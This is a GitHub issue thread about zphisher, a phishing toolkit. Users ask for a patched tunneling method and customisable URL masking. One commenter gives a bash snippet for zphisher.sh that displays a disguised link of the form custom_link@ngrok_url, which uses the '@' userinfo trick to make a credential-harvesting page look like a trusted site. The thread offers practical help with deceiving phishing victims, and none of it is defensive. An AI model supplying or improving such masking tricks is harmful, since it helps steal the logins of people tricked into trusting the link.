### ISSUE TITLE
Enable Dual link + Update Patch 

### ISSUE THREAD

**Issue by khansaad1275** [htr-tech/zphisher#109]
You need to **patch the 3rd tunneling method** as well as I suggest you should also give us both the URL (the original Ngrok URL as well as your masked one).

You are masking URL Randomly **Please add a customization method for URL masking**

Thanks, This tool is working in 2020

**Comment by htr-tech** [comment]
@khansaad1275 ok . i will keep that in mind . Thanks 


### Suggested_Change

**Comment by graysuit** [comment]
@khansaad1275 
Its open source code.

You can change 

Just append following in `zphisher.sh` before line 352
`mask='http://your_custom_link_here'`
`echo -e "\n${RED}[${WHITE}-${RED}]${BLUE} URL 2 : ${GREEN}$mask@$ngrok_url1"`


https://github.com/htr-tech/zphisher/blob/master/zphisher.sh#L352
